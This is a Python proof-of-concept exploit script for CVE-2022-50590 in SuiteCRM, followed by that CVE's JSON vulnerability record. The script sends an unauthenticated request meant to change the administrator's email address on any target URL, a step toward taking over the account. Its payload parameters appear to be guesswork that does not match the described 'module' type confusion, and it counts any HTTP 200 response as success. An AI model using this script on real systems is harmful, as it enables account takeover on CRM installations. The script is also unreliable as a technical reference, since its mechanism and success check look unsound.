CVE-2022-50590

import requests import sys # CVE-2022-50590 PoC - SuiteCRM deleteAttachment Type Confusion # Target: SuiteCRM < 7.12.6 # Effect: Unauthenticated attacker can modify database objects def exploit_suitecrm(target_url, admin_new_email): """ Exploit type confusion vulnerability in SuiteCRM deleteAttachment functionality to change administrator email address. Args: target_url: Base URL of vulnerable SuiteCRM instance admin_new_email: New email address to set for admin account """ # Target endpoint for deleteAttachment functionality endpoint = f"{target_url.rstrip('/')}/index.php" # Type confusion payload - module parameter manipulation # The vulnerability allows arbitrary database modification via type confusion payload = { 'module': 'Users', # Target module for admin modification 'action': 'deleteAttachment', # Vulnerable action 'record': '1', # Admin user record ID 'field_name': 'email1', # Field to modify 'new_value': admin_new_email # New email for admin account } print(f"[*] Exploiting CVE-2022-50590 on {target_url}") print(f"[*] Target: {endpoint}") print(f"[*] Payload: {payload}") try: # Send exploit request (no authentication required) response = requests.post(endpoint, data=payload, timeout=30) if response.status_code == 200: print("[+] Request sent successfully") print(f"[*] Response status: {response.status_code}") # Check if email was modified if admin_new_email in response.text or response.status_code == 200: print(f"[!] Potential successful exploitation") print(f"[!] Admin email may have been changed to: {admin_new_email}") return True else: print(f"[-] Request failed with status: {response.status_code}") return False except requests.exceptions.RequestException as e: print(f"[-] Connection error: {e}") return False if __name__ == "__main__": if len(sys.argv) < 3: print("Usage: python cve_2022_50590.py <target_url> <new_admin_email>") print("Example: python cve_2022_50590.py http://target.com/ [email protected]") sys.exit(1) target = sys.argv[1] new_email = sys.argv[2] exploit_suitecrm(target, new_email)

{"cve": {"id": "CVE-2022-50590", "sourceIdentifier": "[email protected]", "published": "2025-11-06T20:15:36.990", "lastModified": "2025-11-24T19:05:39.117", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SuiteCRM versions prior to 7.12.6 contain a type confusion vulnerability within the processing of the ‘module’ parameter within the ‘deleteAttachment’ functionality. Successful exploitation allows remote unauthenticated attackers to alter database objects including changing the email address of the administrator."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.8, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-843"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:salesagility:suitecrm:*:*:*:*:*:*:*:*", "versionEndExcluding": "7.12.6", "matchCriteriaId": "ADD22F85-ECD2-455A-9441-636E35C01F1B"}]}]}], "references": [{"url": "https://blog.exodusintel.com/2022/06/09/salesagility-suitecrm-deleteattachment-type-confusion-vulnerability/", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://docs.suitecrm.com/admin/releases/7.12.x/#_7_12_6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://www.vulncheck.com/advisories/suitecrm-type-confusion-via-deleteattachment-functionality", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}